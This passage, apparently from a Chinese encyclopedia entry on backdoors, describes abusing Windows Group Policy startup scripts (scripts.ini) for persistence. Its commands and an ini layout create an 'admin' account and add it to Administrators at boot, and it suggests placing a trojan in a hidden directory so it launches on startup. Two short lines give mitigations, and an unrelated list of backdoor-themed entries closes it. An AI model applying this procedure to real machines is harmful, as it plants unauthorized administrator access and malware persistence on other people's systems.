利用過程:啟動組策略(運行->gpedit.msc->計算機配置->Windows 設定->腳本(啟動/關機) )
2、啟動與關機相關設定
選擇啟動->屬性->添加,會彈出選擇腳本名。選擇程式 C:\windows\System32\net.exe,參數 useradmin /add 來執行 net user admin /add。再同樣添加C:\Windows\system32\net.exelocalgroup administrators admin /add來執行 net localgroup administratorsadmin /add。
費話少說: 再經過進一步了解的時候發現這裡是由C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\scripts.ini(PS:默認是隱藏的。)來控制 shutdown 和 Startup 的。
ini組成方式如下:
[Startup]
0CmdLine=C:\WINDOWS\system32\net.exe
0Parameters=user admin /add
1CmdLine=C:\WINDOWS\system32\net.exe
1Parameters=localgroup administrators admin /add
[Shutdown]
0CmdLine=1.bat
0Parameters=
[startup] \\代表是啟動
0CmdLine=C:\WINDOWS\system32\net.exe \\腳本名
0Parameters=user admin /add \\腳本參數
1CmdLine=C:\WINDOWS\system32\net.exe \\第二條腳本名
1Parameters=localgroup administrators admin /add \\第二條腳本參數
[Shutdown] \\關閉
0CmdLine=1.bat \\腳本名 1.bat 目錄隊應於
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup
0Parameters= \\參數
也就是說 scripts.ini 控制著整個啟動,就如同以前 win.ini 一樣。
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup\ 啟動檔案的目錄,那樣腳本名路徑就可以不用加詳細目錄名了。
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\shutdown\ 關閉檔案目錄,同上。
思路就這樣,copy 後門到非常隱藏的目錄,再加個啟動腳本參數,實現木馬啟動。
解決此缺陷的方法:組策略->計算機配置->管理模板->系統->腳本,相應的禁止就行了。
或者來招毒的,徹底禁止掉這個:把scripts.ini 對套用戶許可權全部刪除,system administrators 全部取消,就沒人能訪問了。
以上在 Windows XP SP2 均已測試成功。
相關詞條
-
後門開啟方式
後門開啟方式有哪些? 後門開啟方式:正常的車的後門都是側開的,除此之外,後門開啟方式還有對開、側滑等方式。
-
IRC後門病毒
2004年年初,IRC後門病毒開始在全球網路大規模出現。一方面有潛在的泄漏本地信息的危險,另一方面病毒出現在區域網路中使網路阻塞,影響正常工作,從而造成損...
技術報告 手工清除方法 安全建議 後門概念 密碼破解後門 -
系統後門
後門又稱為Back Door,大家都知道,一台計算機上有65535個連線埠,那么如果把計算機看作是一間屋子,那么這65535個連線埠就可以它看做是計算機為了...
概述 類型 -
後門事件
後門事件是指360安全衛士在安裝進用戶電腦時,會偷偷開設“後門”。在此事件爆出後,奇虎公司試圖用此前爆出的“漏洞”來掩蓋其“存在後門”的事實。
簡介 起源 專家揭黑 “後門”軟體四大危害 瑞星公司PK奇虎360 -
仙後門
仙后門是指東方神起的fans,事情的經過是兩名中國女冬粉到韓國看東方神起的表演,其中一位是孕婦,表演結束後2名女冬粉包車追隨該組合,然後該組合成員沈昌珉...
事件起因 打人多個版本 11.28聖戰 事件思考 參考資料 -
代理後門
Backdoor/Agent.b“代理後門”變種b是一個通過AOL即時信使訊息傳播的後門程式。此後門運行後,以winimsg.exe為名自我複製到系統目...
簡介 預防 -
IRC後門
IRC全名為Internet Relay Chat,是一款即時聊天工具,類似網路聊天室,但功能更強大。
IRC後門 相關條目 -
軟體後門
硬體後門是硬體在設計或製造時存在的漏洞,例如晶片製造時設計一些具有後門功能的邏輯電路。軟體後門可以理解為在軟體中植入病毒等具有後門功能的代碼,通過運行軟...
硬體的黑客技術 對軟體後門的攻擊 間諜軟體 間諜軟體創造後門的過程 -
後門病毒
後門病毒的前綴是:Backdoor。該類病毒的特性是通過網路傳播,給系統開後門,給用戶電腦帶來安全隱患。2004年年初,IRC後門病毒開始在全球網路大規...
技術報告 手工清除方法 安全建議 後門概念 密碼破解後門